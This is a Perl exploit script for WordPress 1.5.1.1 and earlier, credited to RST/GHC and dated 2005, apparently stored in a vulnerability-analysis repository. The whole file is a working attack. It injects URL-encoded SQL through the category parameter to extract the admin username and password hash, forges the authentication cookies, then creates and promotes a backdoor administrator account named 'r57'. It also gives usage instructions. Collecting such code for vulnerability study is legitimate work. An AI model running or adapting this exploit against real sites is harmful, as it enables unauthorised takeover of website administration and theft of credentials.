lilbool/vuln-code-analysis
0
1#!/usr/bin/perl
2
3## WordPress <= 1.5.1.1 sql injection "add new admin" exploit
4## by RST/GHC , http://rst.void.ru , http://ghc.ru
5## coded by 1dt.w0lf
6
7use LWP::UserAgent;
8use Getopt::Std;
9use HTTP::Cookies;
10use Digest::MD5 qw(md5_hex);
11getopts('h:p:');
12
13$path = $opt_h;
14$pref = $opt_p || 'wp_';
15
16if(!$path) { usage(); }
17
18$xpl = LWP::UserAgent->new() or die;
19&header();
20print " +---[x] STEP 1 - TRY GET ADMIN INFO\n";
21$reg = $path;
22$reg .= '?%63%61%74=%36%36%36%20%75%6E%69%6F%6E%20%73%65%6C%65%63%74%20%36%36%36%2C%63%6F%6E'.
23 '%63%61%74%28%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75%73%65%72%5F%6C%6F%67%69'.
24 '%6E%2C%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75%73%65%72%5F%70%61%73%73%2C%63'.
25 '%68%61%72%28%35%38%2C%35%38%2C%35%38%29%29%2C%6E%75%6C%6C%2C%6E%75%6C%6C%2C%6E%75%6C'.
26 '%6C%20%66%72%6F%6D%20'.$pref.'%75%73%65%72%73%20%57%48%45%52%45%20%49%44=1'; ### 1 - admin ID
27$res = $xpl->get($reg);
28die "ERROR : ", $res->status_line unless $res->is_success;
29if($res->content =~ m/(?::::)(.*)(?::::)([a-f0-9]{32})(?::::)(<\/title>)/)
30 {
31 $login = $1; $hash = $2;
32 print "\n>> LOGIN : $login\n>> HASH : $hash\n\n";
33 }
34else { print "ERROR : Forum not vulnerable or bad prefix."; exit(); }
35
36$cookie_jar = HTTP::Cookies->new();
37($cpath = $path) =~ s!/$!!;
38$hash = md5_hex($hash);
39($host = $cpath) =~ s!http://([^/]*).*!$1!;
40$cpath = md5_hex($cpath);
41
42$xpl->cookie_jar( $cookie_jar );
43
44$cookie_jar->set_cookie( "0","wordpresspass_$cpath","$hash","/",$host,,,,,);
45$cookie_jar->set_cookie( "1","wordpressuser_$cpath","$login","/",$host,,,,,);
46print " +---[x] STEP 2 - CREATE NEW USER\n";
47$reg = $path;
48$reg .= 'wp-admin/users.php';
49$res = $xpl->post("$reg",
50{
51 "action" => "adduser",
52 "user_login" => "r57",
53 "firstname" => "RST",
54 "lastname" => "GHC",
55 "email" => "billy\@microsoft.com",
56 "uri" => "http://rst.void.ru",
57 "pass1" => "r57",
58 "pass2" => "r57",
59 "adduser" => "Submit",
60},
61Referer => $reg
62);
63print " +---[x] STEP 3 - GET ID OF NEW USER\n";
64$reg = $path;
65$reg .= 'wp-admin/users.php';
66$res = $xpl->get("$reg",Referer => $reg);
67@res = split(/\n/,$res->content);
68$id = 0;
69for(@res)
70 {
71 if(/(?:\<td align=\'center\'\>)([0-9]*)(?:\<\/td\>)/) { $id = $1; }
72 if(/\<td\>\<strong\>r57\<\/strong\>\<\/td\>/) { last; }
73 }
74die "ERROR : ", $res->status_line unless $res->is_success;
75if($id != 0) { print "\n>> ID : $id\n\n"; }
76else { print "[-] ERROR : CAN'T GET NEW USER ID\n"; exit(); }
77print " +---[x] STEP 4 - LEVEL UP FOR NEW USER\n\n";
78$reg = $path;
79$reg .= 'wp-admin/users.php?action=promote&id='.$id.'&prom=up';
80for($i=0;$i<10;$i++)
81{
82print ">> LEVEL UP # $i\n";
83$res = $xpl->get("$reg",Referer => $reg);
84die "ERROR : ", $res->status_line unless $res->is_success;
85}
86print "\nTHATS ALL. NOW YOU CAN LOGIN WITH USERNAME 'r57' AND PASSWORD 'r57'\n";
87
88sub usage()
89{
90 &header();
91 print "USAGE : r57wp.pl [OPTIONS]\n";
92 print "\noptions:\n\n";
93 print "-h [path]\n";
94 print " Path to wordpress installed\n";
95 print "-p [prefix] (optional)\n";
96 print " Database tables prefix (default 'wp_')\n\n";
97 print "e.g.: r57wp.pl -h http://blah.com/wordpress/\n";
98 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
99 print "(c)oded by 1dt.w0lf\n";
100 print "RST/GHC\n";
101 print "http://ghc.ru\n";
102 print "http://rst.void.ru\n";
103 exit();
104}
105sub header()
106{
107 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
108 print " WordPress 1.5.1.1 exploit \n";
109 print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
110}
111
112# milw0rm.com [2005-06-21]